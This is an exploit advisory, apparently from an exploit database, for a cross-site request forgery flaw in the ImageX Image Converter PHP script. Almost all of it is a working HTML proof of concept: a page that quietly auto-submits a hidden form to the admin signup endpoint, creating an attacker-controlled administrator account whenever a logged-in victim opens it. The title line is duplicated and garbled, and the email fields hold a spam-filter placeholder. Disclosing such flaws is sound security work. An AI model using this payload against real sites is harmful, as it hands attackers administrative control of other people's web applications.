ImageX Image Converter Cross Site Request Forgery

Exploit Title: ImageX - Image Converter - Cross Site Request Exploit Title: ImageX - Image Converter - Cross Site Request Forgery (CSRF) (Add Admin)
Date: 05-03-2025
Exploit Author: Bu?ra Enis D?nmez
Vendor Homepage: https://www.codester.com/items/48649/imagex-image-converter-120-formats-php-script
Version: latest
Tested on: Arch Linux
##################################### CSRF PoC #####################################

<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h1>CSRF PoC</h1>
<form id="csrfForm" action="https://localhost/mega-img-converter/actions/regadminsignupauth.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="This email address is being protected from spambots. You need JavaScript enabled to view it." />
<input type="hidden" name="lastname" value="neci" />
<input type="hidden" name="email" value="This email address is being protected from spambots. You need JavaScript enabled to view it." />
<input type="hidden" name="password" value="kenan5" />
<input type="hidden" name="confirmpassword" value="kenan5" />
<input type="hidden" name="isajax" value="someValue" />
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>

##################################### CSRF PoC Ended #####################################